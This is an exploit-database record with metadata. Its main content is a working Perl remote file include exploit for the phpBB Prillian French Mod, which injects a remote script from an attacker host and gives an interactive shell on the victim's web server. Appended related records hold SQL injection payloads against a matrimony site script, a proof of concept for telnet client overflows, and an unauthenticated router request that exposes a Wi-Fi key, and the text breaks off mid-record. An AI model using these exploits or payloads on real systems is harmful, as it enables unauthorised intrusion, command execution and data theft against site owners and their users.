ID 1337DAY-ID-987
Type zdt
Reporter Nima Salehi
Modified 2006-10-13T00:00:00
Description
Exploit for unknown platform in category web applications
==============================================================
phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit
==============================================================
#!/usr/bin/perl
#####################################################################################################
# #
# PhpBB Prillian French #
# #
# Class: Remote File Include Vulnerability #
# #
# Patch: unavailable #
# #
# Date: 2006/10/12 #
# #
# Remote: Yes #
# #
# Type: high #
# #
#####################################################################################################
use IO::Socket;
use LWP::Simple;
$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script
print "\n";
print "##########################################################################\n";
print "# #\n";
print "# PhpBB Prillian French Remote File Include Vulnerability #\n";
print "# Bug found By : Ashiyane Corporation #\n";
print "# Web Site : www.Ashiyane.ir #\n";
print "# #\n";
print "##########################################################################\n";
if (@ARGV < 2)
{
print "\n Usage: Ashiyane.pl [host] [path] ";
print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vul="/language/lang_french/lang_prillian_faq.php?phpbb_root_path="
print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";
print "<Shell> ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "<Shell> ";
$cmd = <STDIN>;
}
# 0day.today [2018-01-05] #
{"hash": "970de682cdbccf2523d7f0fd67d1ebe2001d03d5df6e988d2e757c76be39d75e", "id": "1337DAY-ID-987", "lastseen": "2018-01-05T21:13:26", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bad878ce92546233e9e69c63cfbbbf2a", "key": "href"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "modified"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0b711bb3a86d234678ca90bbe6d736ed", "key": "reporter"}, {"hash": "17dd966075384205a2490a701a40e098", "key": "sourceData"}, {"hash": "77124d089275a30d7925f456f636515e", "key": "sourceHref"}, {"hash": "02136e3d2223f73a254d8c851d44a162", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31805", "1337DAY-ID-30759", "1337DAY-ID-27921", "1337DAY-ID-27006", "1337DAY-ID-25853", "1337DAY-ID-24685", "1337DAY-ID-21146", "1337DAY-ID-20185", "1337DAY-ID-9072", "1337DAY-ID-9071"]}, {"type": "exploitdb", "idList": ["EDB-ID:27778"]}], "modified": "2018-01-05T21:13:26"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/987", "description": "Exploit for unknown platform in category web applications", "title": "phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit", "history": [{"bulletin": {"hash": "67a85435e61fd0a8a5d30ad89b5a2bd432e957b058177134213fbf43acf41238", "id": "1337DAY-ID-987", "lastseen": "2016-04-19T23:54:42", "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T23:54:42"}}, "hashmap": [{"hash": "f4e76978ed72892b54436fb236eb8399", "key": "href"}, {"hash": "0b711bb3a86d234678ca90bbe6d736ed", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "02136e3d2223f73a254d8c851d44a162", "key": "title"}, {"hash": "6576fb92b14f01adca9718a51a9fcc8d", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "modified"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "published"}, {"hash": "c80b6373278302c0642ea902eb9827e4", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/987", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==============================================================\r\nphpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n \r\n#####################################################################################################\r\n# #\r\n# PhpBB Prillian French #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Patch: unavailable #\r\n# #\r\n# Date: 2006/10/12 #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n#####################################################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"##########################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# PhpBB Prillian French Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\r\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\r\nprint \"# #\\n\";\r\nprint \"##########################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\r\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\r\nexit;\r\n}\r\n\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$vul=\"/language/lang_french/lang_prillian_faq.php?phpbb_root_path=\"\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-10-13T00:00:00", "references": [], "reporter": "Nima Salehi", "modified": "2006-10-13T00:00:00", "href": "http://0day.today/exploit/description/987"}, "lastseen": "2016-04-19T23:54:42", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==============================================================\r\nphpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n \r\n#####################################################################################################\r\n# #\r\n# PhpBB Prillian French #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Patch: unavailable #\r\n# #\r\n# Date: 2006/10/12 #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n#####################################################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"##########################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# PhpBB Prillian French Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\r\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\r\nprint \"# #\\n\";\r\nprint \"##########################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\r\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\r\nexit;\r\n}\r\n\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$vul=\"/language/lang_french/lang_prillian_faq.php?phpbb_root_path=\"\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2006-10-13T00:00:00", "references": [], "reporter": "Nima Salehi", "modified": "2006-10-13T00:00:00", "href": "https://0day.today/exploit/description/987"}
{"zdt": [{"lastseen": "2019-03-26T01:13:42", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-03-25T00:00:00", "published": "2019-03-25T00:00:00", "id": "1337DAY-ID-32411", "href": "https://0day.today/exploit/description/32411", "title": "Matri4Web Matrimony Web Script SQL Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Matrimony Website Script - Multiple SQL Injection\r\n# Exploit Author: Ahmet \u00dcmit BAYRAM\r\n# Vendor Homepage: https://www.matri4web.com\r\n# Demo Site: https://www.matrimonydemo.com\r\n# Version: M-Plus\r\n# Tested on: Kali Linux\r\n# CVE: N/A\r\n\r\n----- PoC 1: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/simplesearch_results.php\r\nVulnerable Parameter: txtGender (POST)\r\nAttack Pattern:\r\nFage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0\r\n\r\n----- PoC 2: SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/advsearch_results.php\r\nVulnerable Parameter: religion (POST)\r\nAttack Pattern:\r\nage1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo\r\n\r\n----- PoC 3 - SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/specialcase_results.php\r\nVulnerable Parameter: Fage\r\nAttack Pattern:\r\nFage=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'\"%2B(select(0)from(select(sleep(0)))v)%2B\"*/&Tage=18&caste=Any&religion=Any&sp_cs=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo&txtprofile=7\r\n\r\n----- PoC 4 - SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/locational_results.php\r\nVulnerable Parameter: cboCountry (POST)\r\nAttack Pattern:\r\nFage=18&Tage=18&cboCountry=-1'%20OR%203*2*1=6%20AND%20000567=000567%20--%20&cboState=Any&city=Any&submit=Submit&txtCountry=Argentina&txtCountryLength=9&txtGender=Male&txtNumCountries=251&txtNumStates=25&txtSelectedCountry=9&txtSelectedState=10&txtState=Entre%20Rios&txtStateLength=10&txtphoto=Show%20profiles%20with%20Photo\r\n\r\n----- PoC 5 - SQLi -----\r\n\r\nRequest: http://localhost/[PATH]/registration2.php\r\nVulnerable Parameter: religion (POST)\r\nAttack Pattern:\r\nEMAILconfirm=sample%40email.tst&Language=&dobDay=&dobMonth=&dobYear=&religion=-1'%20OR%203*2*1=6%20AND%20000830=000830%20--%20&submit=Submit&txtAccept=I%20Accept%20%20the%20Terms%20and%20Conditions&txtGender=Male&txtMC=&txtMobile=987-65-4329&txtName=FtkKDgHs&txtPC=Self&txtcp=1\n\n# 0day.today [2019-03-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32411"}, {"lastseen": "2018-12-24T20:31:21", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2018-12-17T00:00:00", "published": "2018-12-17T00:00:00", "id": "1337DAY-ID-31805", "href": "https://0day.today/exploit/description/31805", "title": "GNU inetutils < 1.9.4 - (telnet.c) Multiple Overflows Exploit", "type": "zdt", "sourceData": "GNU inetutils <= 1.9.4 telnet.c multiple overflows\r\n==================================================\r\nGNU inetutils is vulnerable to a stack overflow vulnerability in the client-side environment \r\nvariable handling which can be exploited to escape restricted shells on embedded devices. \r\nMost modern browsers no longer support telnet:// handlers, but in instances where URI\r\nhandlers are enabled to the inetutils telnet client this issue maybe remotely triggerable. \r\nA stack-based overflow is present in the handling of environment variables when connecting \r\ntelnet.c to remote telnet servers through oversized DISPLAY arguments.\r\n\r\nA heap-overflow is also present which can be triggered in a different code path due to \r\nsupplying oversized environment variables during client connection code. \r\n\r\nThe stack-based overflow can be seen in the following code snippet from the latest inetutils \r\nrelease dated 2015.\r\n\r\ninetutils-telnet/inetutils-1.9.4/telnet/telnet.c\r\n\r\n983- case TELOPT_XDISPLOC:\r\n984- if (my_want_state_is_wont (TELOPT_XDISPLOC))\r\n985-\treturn;\r\n986- if (SB_EOF ())\r\n987-\treturn;\r\n988- if (SB_GET () == TELQUAL_SEND)\r\n989-\t{\r\n990-\t unsigned char temp[50], *dp;\r\n991-\t int len;\r\n992-\r\n993-\t if ((dp = env_getvalue (\"DISPLAY\")) == NULL)\r\n994-\t {\r\n995-\t /*\r\n996-\t * Something happened, we no longer have a DISPLAY\r\n997-\t * variable. So, turn off the option.\r\n998-\t */\r\n999-\t send_wont (TELOPT_XDISPLOC, 1);\r\n1000-\t break;\r\n1001-\t }\r\n1002:\t sprintf ((char *) temp, \"%c%c%c%c%s%c%c\", IAC, SB, TELOPT_XDISPLOC,\r\n1003-\t\t TELQUAL_IS, dp, IAC, SE);\r\n1004-\t len = strlen ((char *) temp + 4) + 4;\t/* temp[3] is 0 ... */\r\n1005-\r\n1006-\t if (len < NETROOM ())\r\n\r\nWhen a telnet server requests environment options the sprintf on line 1002 will\r\nnot perform bounds checking and causes an overflow of stack buffer temp[50] defined\r\nat line 990. This issue can be trivially fixed using a patch to add bounds checking\r\nto sprintf such as with a call to snprintf(); \r\n\r\nAn example of the heap overflow can be seen when handling large environment\r\nvariables within the telnet client, causing heap buffer memory corruption\r\nthrough long string supplied in example USER or DISPLAY.\r\n\r\nAn example of triggering this issue on inetutils in Arch Linux can be seen below:\r\n\r\nDISPLAY=`perl -e 'print Ax\"50000\"'` telnet -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nTrying 192.168.69.1...\r\nConnected to 192.168.69.1.\r\nEscape character is '^]'.\r\nrealloc(): invalid next size\r\nAborted (core dumped)\r\n\r\nThese issues are present anywhere that inetutils is used as a base for clients\r\nsuch as in common embedded home routers or networking equipment. An attacker\r\ncan potentially exploit these vulnerabilities to gain arbitrary code execution\r\non platforms where telnet commands are available. An example debug trace of the\r\nheap overflow can be found below:\r\n\r\n(gdb) run -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nStarting program: /usr/bin/telnet -l`perl -e 'print \"A\"x5000'` 192.168.69.1\r\nTrying 192.168.69.1...\r\nConnected to 192.168.69.1.\r\nEscape character is '^]'.\r\nrealloc(): invalid next size\r\n\r\nProgram received signal SIGABRT, Aborted.\r\n0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6\r\n(gdb) bt\r\n#0 0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6\r\n#1 0x00007ffff7d72672 in abort () from /usr/lib/libc.so.6\r\n#2 0x00007ffff7dca878 in __libc_message () from /usr/lib/libc.so.6\r\n#3 0x00007ffff7dd118a in malloc_printerr () from /usr/lib/libc.so.6\r\n#4 0x00007ffff7dd52ac in _int_realloc () from /usr/lib/libc.so.6\r\n#5 0x00007ffff7dd62df in realloc () from /usr/lib/libc.so.6\r\n#6 0x000055555556029c in ?? ()\r\n#7 0x0000555555560116 in ?? ()\r\n#8 0x000055555556049f in ?? ()\r\n#9 0x00005555555606b7 in ?? ()\r\n#10 0x00005555555616de in ?? ()\r\n#11 0x0000555555561b8d in ?? ()\r\n#12 0x0000555555562122 in ?? ()\r\n#13 0x000055555555c6f4 in ?? ()\r\n#14 0x00005555555591e7 in ?? ()\r\n#15 0x00007ffff7d74223 in __libc_start_main () from /usr/lib/libc.so.6\r\n#16 0x00005555555592be in ?? ()\r\n\r\nDue to the various devices embedding telnet from inetutils and distributions\r\nsuch as Arch Linux using inetutils telnet, it is unclear the full impact and all\r\nscenarios where this issue could be leveraged. An attacker may seek to exploit\r\nthese vulnerabilities to escape restricted shells.\r\n\r\n-- Hacker Fantastic (11/12/2018)\r\n\r\nhttps://hacker.house\n\n# 0day.today [2018-12-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31805"}, {"lastseen": "2018-07-24T02:13:58", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-23T00:00:00", "published": "2018-07-23T00:00:00", "id": "1337DAY-ID-30759", "href": "https://0day.today/exploit/description/30759", "title": "TP-Link Archer C2 v3.0 UnAuthenticated Remote Code Execution Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: [UnAuthenticated Remote Code Execution at TP-Link Archer C2 Router]\r\n# Date: [17.07.2018] \r\n# Exploit Author: [Ismail Tasdelen]\r\n# Vendor Homepage: [https://www.tp-link.com/]\r\n# Hardware Link : [https://www.tp-link.com/la/products/details/cat-9_Archer-C2.html]\r\n# Hardware Version : [Archer C2 v3.0]\r\n# Firmware Version : [3.0.0 Build 20160713 Rel. 74035(EU)]\r\n# Vulernability Type : [RCE - Remote Code Execution]\r\n# Vulenrability : [UnAuthenticated Remote Code Execution]\r\n# Risk : [High]\r\n\r\n# Description : What is remote code execution vulnerability ?\r\n\r\nVulnerabilities can provide an attacker with the ability to execute malicious code and take complete control of an affected system with the privileges of the user running the application. Remote code execution can be best described as an action which involves an attacker executing code remotely using system vulnerabilities. Such code can run from a remote server, which means that the attack can originate from anywhere around the world giving the attacker access to the PC. Once a hacker gains access to a system, they\u2019ll be able to make changes within the target computer.The attacker leverages the user\u2019s admin privileges to allow them to execute code and make further changes to the computer. It\u2019s often the case that such user privileges become elevated. Attackers usually look to gain further control on the system they already have a grip on and look to exert control onto other computers on the same network.\r\n\r\n# POC:\r\n\r\n# cURL Request :\r\n\r\ncurl 'http://198.168.0.1:8081/cgi-bin/luci/;stok=78c53e5bb36166c34245a44bd99edd59/admin/ledgeneral?form=setting' -H 'Host: 198.168.0.1:8081' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://198.168.0.1:8081/webpages/index.html' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: sysauth=50e6c4175557343bb0aac91fa2e0ce7f' -H 'Connection: keep-alive' --data 'operation=write'\r\n\r\n# HTTP Request :\r\n\r\nPOST /cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/ledgeneral?form=setting HTTP/1.1\r\nHost: 198.168.0.1:8081\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://198.168.0.1:8081/webpages/index.html\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 15\r\nCookie: sysauth=e3638eb1f1952c2a56bd50f466603048\r\nConnection: keep-alive\r\n\r\n# HTTP Response :\r\n\r\nHTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: application/json\r\nCache-Control: no-cache\r\nExpires: 0\r\n\r\nJSON Data :\r\n\r\n{\r\n \"log\": {\r\n \"version\": \"1.1\",\r\n \"creator\": {\r\n \"name\": \"Firefox\",\r\n \"version\": \"52.9.0\"\r\n },\r\n \"browser\": {\r\n \"name\": \"Firefox\",\r\n \"version\": \"52.9.0\"\r\n },\r\n \"pages\": [\r\n {\r\n \"startedDateTime\": \"2018-07-17T13:09:51.042+03:00\",\r\n \"id\": \"page_1\",\r\n \"title\": \"Wireless Router Archer C2\",\r\n \"pageTimings\": {\r\n \"onContentLoad\": -1,\r\n \"onLoad\": -1\r\n }\r\n }\r\n ],\r\n \"entries\": [\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:51.042+03:00\",\r\n \"time\": 930,\r\n \"request\": {\r\n \"bodySize\": 15,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/ledgeneral?form=setting\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"15\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"setting\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=write\"\r\n },\r\n \"headersSize\": 577\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 79,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"enable\\\":\\\"off\\\",\\\"time_set\\\":\\\"yes\\\",\\\"ledpm_support\\\":\\\"yes\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 79\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 0,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 922,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:59.652+03:00\",\r\n \"time\": 987,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wi